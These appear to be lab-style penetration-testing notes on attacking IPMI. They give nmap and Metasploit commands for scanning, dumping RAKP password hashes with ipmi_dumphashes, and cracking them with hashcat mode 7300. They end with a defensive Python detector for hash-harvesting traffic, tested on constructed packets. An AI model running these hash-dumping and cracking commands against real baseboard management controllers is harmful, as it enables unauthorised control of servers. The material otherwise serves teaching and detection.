IPMI
Port UDP/623
Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring.
IPMI is typically used in three ways:
Before the OS has booted to modify BIOS settings
When the host is fully powered down
Access to a host after a system failure
Tools
sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local
Metasploit version scan
use auxiliary/scanner/ipmi/ipmi_version
Flaw
The RAKP protocol in IPMI 2.0 has a flaw: during the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place.
Hashcat
mode 7300
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
To retrieve IPMI hashes, we can use the Metasploit IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval module:
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts <IP>
run
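A defender's view of the RAKP exchange described above, as an added example that is not part of the original notes: it parses RMCP+ datagrams sent to UDP/623 and flags sources that start RAKP for several user names without ever sending RAKP Message 3. The sample packets are constructed, and the function names, the threshold and the "no Message 3" heuristic are assumptions.

```python
import struct
from collections import defaultdict

RMCP_IPMI = bytes([0x06, 0x00, 0xFF, 0x07])  # RMCP v1.0, no-ACK seq, class IPMI
AUTH_RMCPP = 0x06                            # IPMI 2.0 (RMCP+) session format
RAKP1, RAKP3 = 0x12, 0x14                    # RMCP+ payload types

def parse_rmcpp(data):
    """Return (payload_type, payload) for an RMCP+ datagram, else None."""
    if len(data) < 16 or data[:4] != RMCP_IPMI or data[4] != AUTH_RMCPP:
        return None
    ptype = data[5] & 0x3F                   # drop encrypted/authenticated bits
    (plen,) = struct.unpack_from("<H", data, 14)
    payload = data[16:16 + plen]
    return (ptype, payload) if len(payload) == plen else None

def rakp1_username(payload):
    """User name requested in RAKP Message 1 (length byte at offset 27)."""
    if len(payload) < 28 or len(payload) < 28 + payload[27]:
        return None
    return payload[28:28 + payload[27]].decode("ascii", "replace")

def find_hash_harvesting(packets, min_users=3):
    """packets: (src_ip, udp_payload) pairs observed going to UDP/623.
    Flags sources that open RAKP for >= min_users names, never send Message 3."""
    users, completed = defaultdict(set), set()
    for src, data in packets:
        parsed = parse_rmcpp(data)
        if parsed is None:
            continue
        ptype, payload = parsed
        if ptype == RAKP1:
            name = rakp1_username(payload)
            if name is not None:
                users[src].add(name)
        elif ptype == RAKP3:
            completed.add(src)           # client went on to prove the password
    return {s: sorted(u) for s, u in users.items()
            if len(u) >= min_users and s not in completed}

# --- constructed sample traffic (not captured from a real BMC) ---
def _pkt(ptype, payload):
    return RMCP_IPMI + bytes([AUTH_RMCPP, ptype]) + bytes(8) + struct.pack("<H", len(payload)) + payload
def _rakp1(user):
    return _pkt(RAKP1, bytes(24) + b"\x04\x00\x00" + bytes([len(user)]) + user.encode())

SAMPLE = ([("10.0.5.77", _rakp1(u)) for u in ("admin", "root", "ADMIN", "Administrator")]
          + [("10.0.9.10", _rakp1("admin")), ("10.0.9.10", _pkt(RAKP3, bytes(8)))]
          + [("10.0.5.77", b"\x06\x00\xff\x07short")])   # truncated datagram, ignored
```

Calling `find_hash_harvesting(SAMPLE)` flags only 10.0.5.77; the source that completes the handshake with Message 3 is not reported.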